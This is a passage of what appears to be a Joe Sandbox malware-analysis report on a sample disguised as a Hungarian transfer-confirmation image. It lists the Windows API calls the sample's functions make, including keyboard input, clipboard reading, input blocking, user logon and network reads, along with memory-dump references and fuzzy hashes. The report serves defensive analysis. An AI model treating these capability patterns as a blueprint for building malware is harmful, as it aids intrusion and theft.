                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicollmouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 1033544147-711622031
                                                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031425849-0
                                                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 4170576061-0
                                                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                          APIs
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                          • IsIconic.USER32 ref: 0047A393
                                                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                          • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15083398-0
                                                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: U$\
                                                                                                          • API String ID: 4104443479-100911408
                                                                                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                          • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 901099227-0
                                                                                                          • Opcode ID: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                          • Opcode Fuzzy Hash: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                          APIs
                                                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2346855178-0
                                                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2645101109-0
                                                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
